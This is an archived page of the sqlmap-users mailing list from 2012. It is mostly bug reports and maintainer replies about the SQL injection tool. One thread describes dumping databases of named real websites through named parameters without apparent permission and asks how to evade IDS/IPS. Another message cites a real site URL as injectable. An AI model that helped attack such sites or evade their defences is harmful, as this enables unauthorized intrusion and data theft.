Since you mentioned "not doing anything illegal", I will just say that, checking peoples doors and windows to see if they are open or weak, is not ok even if it's fun and all (but if the site you are testing on have given you permission, or if you own it, then hack away to your hearts content). Anyway to the issue at hand. Are you using the latest development version of sqlmap? If not, then I recommend you do that, since it gets new features and updates all the time, and you will probably see your issue solved there. If you don't have git, then get it, and then do: git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev //C On 30.08.2012 17:06, Arturs Pavlovs wrote: > Hi! > Basically this question is about what Havij does and how to do the > same w/ SQLMap (or better). I made injections and was able to dump > database with Havij in this site - > http://nhl.id.lv/?cat=stats&position=Goalie&sort=saves through > parameter 'sort'. It used MySQL timebased injection (time is usually > 4.x seconds or 3.x - I was not able to set SQLMap to miliseconds or > seconds with commas or points) and retrieved all the needed data > using > slow guessing letters method. But it did the job although it was very > slow. With SQLMap it detects MySQL timebased blind, but is not able > to > retrieve any data. Payload says that there is a possibility of > IDS/IPS > defence. What should I do to get the database name? Any tampering > scripts or combinations of them? Is it possible to get the names of > DBs and tables faster than Havij slo-mo guessing? > There's another site with which I have a similar problem. That's > http://hack-games.com . I set crawling to 2 and use parameters > 'doaction' or 'pmid' . SQLMap finds blind boolean injection, but once > again hits the IDS/IPS defence. Havij on the same page only without > crawling (I specified the page SQLMap found while crawling, but don't > remember it :D) found the DB, but it wasn't able to get normal > characters instead of square boxes. That is probably just an encoding > issue. > Could anyone help me to sort out this situation? > > P.S. > Havij also does database name character count retrieval, before > guessing the numbers. I'm not sure if SQLMap has such function. > P.P.S. > I won't use your help to do something illegal with SQLMap, I'm just > having fun from hacking. No harm done to any of higher mentioned or > any other webpages. |
|
From: Arturs P. <lva...@in...> - 2012-08-30 15:06:13
|
Hi!<br />Basically this question is about what Havij does and how to do the same w/ SQLMap (or better). I made injections and was able to dump database with Havij in this site - http://nhl.id.lv/?cat=stats&position=Goalie&sort=saves through parameter 'sort'. It used MySQL timebased injection (time is usually 4.x seconds or 3.x - I was not able to set SQLMap to miliseconds or seconds with commas or points) and retrieved all the needed data using slow guessing letters method. But it did the job although it was very slow. With SQLMap it detects MySQL timebased blind, but is not able to retrieve any data. Payload says that there is a possibility of IDS/IPS defence. What should I do to get the database name? Any tampering scripts or combinations of them? Is it possible to get the names of DBs and tables faster than Havij slo-mo guessing?<br />There's another site with which I have a similar problem. That's http://hack-games.com . I set crawling to 2 and use parameters 'doaction' or 'pmid' . SQLMap finds blind boolean injection, but once again hits the IDS/IPS defence. Havij on the same page only without crawling (I specified the page SQLMap found while crawling, but don't remember it :D) found the DB, but it wasn't able to get normal characters instead of square boxes. That is probably just an encoding issue.<br />Could anyone help me to sort out this situation?<br /><br />P.S.<br />Havij also does database name character count retrieval, before guessing the numbers. I'm not sure if SQLMap has such function.<br />P.P.S. <br />I won't use your help to do something illegal with SQLMap, I'm just having fun from hacking. No harm done to any of higher mentioned or any other webpages. <div id="sig_lower"> </div> |
|
From: Duarte S. <dua...@se...> - 2012-08-29 20:50:44
|
No problem Miroslav. Regards, Duarte Silva On Aug 29, 2012 8:31 PM, "Miroslav Stampar" <mir...@gm...> wrote: > Hi Duarte. > > You've helped a lot with given details. Find those bugs fixed [1][2] with > the latest commit(s). > > Kind regards, > Miroslav Stampar > > [1] https://github.com/sqlmapproject/sqlmap/issues/166 > [2] https://github.com/sqlmapproject/sqlmap/issues/167 > > On Wed, Aug 29, 2012 at 4:49 PM, Duarte Silva <dua...@se... > > wrote: > >> Hello Miroslav, >> >> > I'll need more information. For starter, does this BigArray issue start >> all >> > of a sudden or during the whole sqlmap run? >> >> At the end of dumping the data, sqlmap outputs a subset of the dumped >> data, >> after that, the error appears. It happens with a ~8000 rows table. >> >> > Also, it's kind of strange to see "AttributeError("'NoneType' object >> has no >> > attribute 'remove'",) in <bound method BigArray.__del__" because only >> > remove method used there is a one from standard system module "os" which >> > for sure exists. >> >> sqlmap does not crash with this error, it simply outputs it. I'm not sure >> but >> maybe it has something to do with the garbadge collection (?). >> >> > Could you please send some console output that happens prior to the >> > "Exception AttributeError: AttributeError("'NoneType'"? >> >> Will do so off list. >> >> > For heuristic problem it would be great if you could provide either a >> > traffic file (--flush-session -t traffic.txt) or url itself. >> >> Same as above :P >> >> Regards, >> Duarte Silva >> >> On Wednesday 29 August 2012 01:41:35 Miroslav Stampar wrote: >> > Hi Duarte. >> > >> > I'll need more information. For starter, does this BigArray issue start >> all >> > of a sudden or during the whole sqlmap run? >> > >> > Also, it's kind of strange to see "AttributeError("'NoneType' object >> has no >> > attribute 'remove'",) in <bound method BigArray.__del__" because only >> > remove method used there is a one from standard system module "os" which >> > for sure exists. >> > >> > Could you please send some console output that happens prior to the >> > "Exception AttributeError: AttributeError("'NoneType'"? >> > >> > For heuristic problem it would be great if you could provide either a >> > traffic file (--flush-session -t traffic.txt) or url itself. >> > >> > Kind regards, >> > Miroslav Stampar >> > >> > On Sun, Aug 26, 2012 at 11:33 AM, Duarte Silva >> > >> > <dua...@se...>wrote: >> > > Hi all, >> > > >> > > when sqlmap is dumping a sample of table data I get this: >> > > > Exception AttributeError: AttributeError("'NoneType' object has no >> > > >> > > attribute >> > > >> > > > 'remove'",) in <bound method BigArray.__del__ of ...[' ', ' ', ' ', >> ' ', >> > > >> > > ' >> > > >> > > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', >> ' ', >> > > >> > > ' >> > > >> > > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', >> ' ', >> > > >> > > ' >> > > >> > > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', >> ' ', >> > > >> > > ' >> > > >> > > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', >> ' ', >> > > >> > > ' >> > > >> > > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', >> ' ', >> > > >> > > ' >> > > >> > > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', >> ' ', >> > > >> > > ' >> > > >> > > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', >> ' ', >> > > >> > > ' >> > > >> > > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', >> ' ', >> > > >> > > '', >> > > >> > > > ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' >> ', ' >> > > >> > > ', ' >> > > >> > > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', >> ' ', >> > > >> > > ' >> > > >> > > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', >> ' ', >> > > >> > > ' >> > > >> > > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', >> ' ', >> > > >> > > ' >> > > >> > > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', >> ' ', >> > > >> > > ' >> > > >> > > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', >> ' ', >> > > >> > > ' >> > > >> > > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', >> ' ', >> > > >> > > ' >> > > >> > > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', >> ' ', >> > > >> > > ' >> > > >> > > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', >> ' ', >> > > >> > > ' >> > > >> > > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', >> ' ', >> > > >> > > ' >> > > >> > > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', >> ' ', >> > > >> > > ' >> > > >> > > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', >> ' ', >> > > >> > > ' >> > > >> > > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', >> ' ', >> > > >> > > ' >> > > >> > > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', >> ' ', >> > > >> > > ' >> > > >> > > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ']> ignored >> > > >> > > This tends to happen with big dumps, that error shows for each column >> > > extracted from the table. >> > > >> > > The other problem is that sqlmap heuristics aren't able to identify >> the >> > > database correctly. The webpage shows the following error >> > > >> > > > Warning: mysql_fetch_array(): supplied argument is not a valid MySQL >> > > >> > > result >> > > >> > > > resource in /home/(...) on line 17 >> > > > >> > > > Warning: mysql_fetch_array(): supplied argument is not a valid MySQL >> > > >> > > result >> > > >> > > > resource in /home/(...) on line 70 >> > > >> > > Sqlmap writes unknown DBMS in the heuristics message. I have sqlmap >> > > updated up >> > > to commit 2af1313010c539adb179cbe4bca988c1213cee13. >> > > >> > > Regards, >> > > Duarte Silva >> > > >> > > >> -------------------------------------------------------------------------- >> > > ---- Live Security Virtual Conference >> > > Exclusive live event will cover all the ways today's security and >> > > threat landscape has changed and how IT managers can respond. >> Discussions >> > > will include endpoint security, mobile security and the latest in >> malware >> > > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ >> > > _______________________________________________ >> > > sqlmap-users mailing list >> > > sql...@li... >> > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > > > -- > Miroslav Stampar > http://about.me/stamparm > |
|
From: Miroslav S. <mir...@gm...> - 2012-08-29 19:31:43
|
Hi Duarte. You've helped a lot with given details. Find those bugs fixed [1][2] with the latest commit(s). Kind regards, Miroslav Stampar [1] https://github.com/sqlmapproject/sqlmap/issues/166 [2] https://github.com/sqlmapproject/sqlmap/issues/167 On Wed, Aug 29, 2012 at 4:49 PM, Duarte Silva <dua...@se...>wrote: > Hello Miroslav, > > > I'll need more information. For starter, does this BigArray issue start > all > > of a sudden or during the whole sqlmap run? > > At the end of dumping the data, sqlmap outputs a subset of the dumped data, > after that, the error appears. It happens with a ~8000 rows table. > > > Also, it's kind of strange to see "AttributeError("'NoneType' object has > no > > attribute 'remove'",) in <bound method BigArray.__del__" because only > > remove method used there is a one from standard system module "os" which > > for sure exists. > > sqlmap does not crash with this error, it simply outputs it. I'm not sure > but > maybe it has something to do with the garbadge collection (?). > > > Could you please send some console output that happens prior to the > > "Exception AttributeError: AttributeError("'NoneType'"? > > Will do so off list. > > > For heuristic problem it would be great if you could provide either a > > traffic file (--flush-session -t traffic.txt) or url itself. > > Same as above :P > > Regards, > Duarte Silva > > On Wednesday 29 August 2012 01:41:35 Miroslav Stampar wrote: > > Hi Duarte. > > > > I'll need more information. For starter, does this BigArray issue start > all > > of a sudden or during the whole sqlmap run? > > > > Also, it's kind of strange to see "AttributeError("'NoneType' object has > no > > attribute 'remove'",) in <bound method BigArray.__del__" because only > > remove method used there is a one from standard system module "os" which > > for sure exists. > > > > Could you please send some console output that happens prior to the > > "Exception AttributeError: AttributeError("'NoneType'"? > > > > For heuristic problem it would be great if you could provide either a > > traffic file (--flush-session -t traffic.txt) or url itself. > > > > Kind regards, > > Miroslav Stampar > > > > On Sun, Aug 26, 2012 at 11:33 AM, Duarte Silva > > > > <dua...@se...>wrote: > > > Hi all, > > > > > > when sqlmap is dumping a sample of table data I get this: > > > > Exception AttributeError: AttributeError("'NoneType' object has no > > > > > > attribute > > > > > > > 'remove'",) in <bound method BigArray.__del__ of ...[' ', ' ', ' ', > ' ', > > > > > > ' > > > > > > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', > ' ', > > > > > > ' > > > > > > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', > ' ', > > > > > > ' > > > > > > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', > ' ', > > > > > > ' > > > > > > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', > ' ', > > > > > > ' > > > > > > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', > ' ', > > > > > > ' > > > > > > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', > ' ', > > > > > > ' > > > > > > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', > ' ', > > > > > > ' > > > > > > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', > ' ', > > > > > > '', > > > > > > > ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' > ', ' > > > > > > ', ' > > > > > > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', > ' ', > > > > > > ' > > > > > > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', > ' ', > > > > > > ' > > > > > > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', > ' ', > > > > > > ' > > > > > > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', > ' ', > > > > > > ' > > > > > > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', > ' ', > > > > > > ' > > > > > > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', > ' ', > > > > > > ' > > > > > > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', > ' ', > > > > > > ' > > > > > > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', > ' ', > > > > > > ' > > > > > > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', > ' ', > > > > > > ' > > > > > > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', > ' ', > > > > > > ' > > > > > > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', > ' ', > > > > > > ' > > > > > > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', > ' ', > > > > > > ' > > > > > > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', > ' ', > > > > > > ' > > > > > > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ']> ignored > > > > > > This tends to happen with big dumps, that error shows for each column > > > extracted from the table. > > > > > > The other problem is that sqlmap heuristics aren't able to identify the > > > database correctly. The webpage shows the following error > > > > > > > Warning: mysql_fetch_array(): supplied argument is not a valid MySQL > > > > > > result > > > > > > > resource in /home/(...) on line 17 > > > > > > > > Warning: mysql_fetch_array(): supplied argument is not a valid MySQL > > > > > > result > > > > > > > resource in /home/(...) on line 70 > > > > > > Sqlmap writes unknown DBMS in the heuristics message. I have sqlmap > > > updated up > > > to commit 2af1313010c539adb179cbe4bca988c1213cee13. > > > > > > Regards, > > > Duarte Silva > > > > > > > -------------------------------------------------------------------------- > > > ---- Live Security Virtual Conference > > > Exclusive live event will cover all the ways today's security and > > > threat landscape has changed and how IT managers can respond. > Discussions > > > will include endpoint security, mobile security and the latest in > malware > > > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > > > _______________________________________________ > > > sqlmap-users mailing list > > > sql...@li... > > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar http://about.me/stamparm |
|
From: Duarte S. <dua...@se...> - 2012-08-29 14:49:58
|
Hello Miroslav,
> I'll need more information. For starter, does this BigArray issue start all
> of a sudden or during the whole sqlmap run?
At the end of dumping the data, sqlmap outputs a subset of the dumped data,
after that, the error appears. It happens with a ~8000 rows table.
> Also, it's kind of strange to see "AttributeError("'NoneType' object has no
> attribute 'remove'",) in <bound method BigArray.__del__" because only
> remove method used there is a one from standard system module "os" which
> for sure exists.
sqlmap does not crash with this error, it simply outputs it. I'm not sure but
maybe it has something to do with the garbadge collection (?).
> Could you please send some console output that happens prior to the
> "Exception AttributeError: AttributeError("'NoneType'"?
Will do so off list.
> For heuristic problem it would be great if you could provide either a
> traffic file (--flush-session -t traffic.txt) or url itself.
Same as above :P
Regards,
Duarte Silva
On Wednesday 29 August 2012 01:41:35 Miroslav Stampar wrote:
> Hi Duarte.
>
> I'll need more information. For starter, does this BigArray issue start all
> of a sudden or during the whole sqlmap run?
>
> Also, it's kind of strange to see "AttributeError("'NoneType' object has no
> attribute 'remove'",) in <bound method BigArray.__del__" because only
> remove method used there is a one from standard system module "os" which
> for sure exists.
>
> Could you please send some console output that happens prior to the
> "Exception AttributeError: AttributeError("'NoneType'"?
>
> For heuristic problem it would be great if you could provide either a
> traffic file (--flush-session -t traffic.txt) or url itself.
>
> Kind regards,
> Miroslav Stampar
>
> On Sun, Aug 26, 2012 at 11:33 AM, Duarte Silva
>
> <dua...@se...>wrote:
> > Hi all,
> >
> > when sqlmap is dumping a sample of table data I get this:
> > > Exception AttributeError: AttributeError("'NoneType' object has no
> >
> > attribute
> >
> > > 'remove'",) in <bound method BigArray.__del__ of ...[' ', ' ', ' ', ' ',
> >
> > '
> >
> > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ',
> >
> > '
> >
> > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ',
> >
> > '
> >
> > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ',
> >
> > '
> >
> > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ',
> >
> > '
> >
> > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ',
> >
> > '
> >
> > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ',
> >
> > '
> >
> > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ',
> >
> > '
> >
> > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ',
> >
> > '',
> >
> > > ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', '
> >
> > ', '
> >
> > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ',
> >
> > '
> >
> > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ',
> >
> > '
> >
> > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ',
> >
> > '
> >
> > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ',
> >
> > '
> >
> > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ',
> >
> > '
> >
> > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ',
> >
> > '
> >
> > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ',
> >
> > '
> >
> > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ',
> >
> > '
> >
> > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ',
> >
> > '
> >
> > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ',
> >
> > '
> >
> > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ',
> >
> > '
> >
> > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ',
> >
> > '
> >
> > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ',
> >
> > '
> >
> > > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ']> ignored
> >
> > This tends to happen with big dumps, that error shows for each column
> > extracted from the table.
> >
> > The other problem is that sqlmap heuristics aren't able to identify the
> > database correctly. The webpage shows the following error
> >
> > > Warning: mysql_fetch_array(): supplied argument is not a valid MySQL
> >
> > result
> >
> > > resource in /home/(...) on line 17
> > >
> > > Warning: mysql_fetch_array(): supplied argument is not a valid MySQL
> >
> > result
> >
> > > resource in /home/(...) on line 70
> >
> > Sqlmap writes unknown DBMS in the heuristics message. I have sqlmap
> > updated up
> > to commit 2af1313010c539adb179cbe4bca988c1213cee13.
> >
> > Regards,
> > Duarte Silva
> >
> > --------------------------------------------------------------------------
> > ---- Live Security Virtual Conference
> > Exclusive live event will cover all the ways today's security and
> > threat landscape has changed and how IT managers can respond. Discussions
> > will include endpoint security, mobile security and the latest in malware
> > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> > _______________________________________________
> > sqlmap-users mailing list
> > sql...@li...
> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users |
|
From: Miroslav S. <mir...@gm...> - 2012-08-28 23:41:43
|
Hi Duarte.
I'll need more information. For starter, does this BigArray issue start all
of a sudden or during the whole sqlmap run?
Also, it's kind of strange to see "AttributeError("'NoneType' object has no
attribute 'remove'",) in <bound method BigArray.__del__" because only
remove method used there is a one from standard system module "os" which
for sure exists.
Could you please send some console output that happens prior to the
"Exception AttributeError: AttributeError("'NoneType'"?
For heuristic problem it would be great if you could provide either a
traffic file (--flush-session -t traffic.txt) or url itself.
Kind regards,
Miroslav Stampar
On Sun, Aug 26, 2012 at 11:33 AM, Duarte Silva
<dua...@se...>wrote:
> Hi all,
>
> when sqlmap is dumping a sample of table data I get this:
>
> > Exception AttributeError: AttributeError("'NoneType' object has no
> attribute
> > 'remove'",) in <bound method BigArray.__del__ of ...[' ', ' ', ' ', ' ',
> '
> > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ',
> '
> > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ',
> '
> > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ',
> '
> > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ',
> '
> > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ',
> '
> > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ',
> '
> > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ',
> '
> > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ',
> '',
> > ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', '
> ', '
> > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ',
> '
> > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ',
> '
> > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ',
> '
> > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ',
> '
> > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ',
> '
> > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ',
> '
> > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ',
> '
> > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ',
> '
> > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ',
> '
> > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ',
> '
> > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ',
> '
> > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ',
> '
> > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ',
> '
> > ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ']> ignored
>
> This tends to happen with big dumps, that error shows for each column
> extracted from the table.
>
> The other problem is that sqlmap heuristics aren't able to identify the
> database correctly. The webpage shows the following error
>
> > Warning: mysql_fetch_array(): supplied argument is not a valid MySQL
> result
> > resource in /home/(...) on line 17
>
> > Warning: mysql_fetch_array(): supplied argument is not a valid MySQL
> result
> > resource in /home/(...) on line 70
>
> Sqlmap writes unknown DBMS in the heuristics message. I have sqlmap
> updated up
> to commit 2af1313010c539adb179cbe4bca988c1213cee13.
>
> Regards,
> Duarte Silva
>
> ------------------------------------------------------------------------------
> Live Security Virtual Conference
> Exclusive live event will cover all the ways today's security and
> threat landscape has changed and how IT managers can respond. Discussions
> will include endpoint security, mobile security and the latest in malware
> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
--
Miroslav Stampar
http://about.me/stamparm
|
|
From: James <ja...@ev...> - 2012-08-27 13:49:02
|
Dummy. On 08/27/2012 08:58 AM, Roberto Neves wrote: > For now the havij is still the best scan sqlinjection. > SqlMap can not scan the many URLs. > Example havij the scaneia http://allindiabirdingtours.com/index.php?id=6 > very easily and quickly. The SqlMap not. > > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > > > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > |
|
From: <du...@al...> - 2012-08-27 13:34:44
|
Actually, SqlMap is far more superior than Havij, and the only reason you like it, is because you simply don't know any better, you are too lazy to learn how SqlMap works and how to use its power. For me Havij has always been a tool for kids, and your mail seems to prove my reasoning to be correct. I suggest you study some more. PS: Havij is closed source and costs money. Seriously?! Are you on crack or something? On 27.08.2012 14:58, Roberto Neves wrote: > For now the havij is still the best scan sqlinjection. > SqlMap can not scan the many URLs. > Example havij the scaneia > http://allindiabirdingtours.com/index.php?id=6 > very easily and quickly. The SqlMap not. |
48 messages has been excluded from this view by a project administrator.
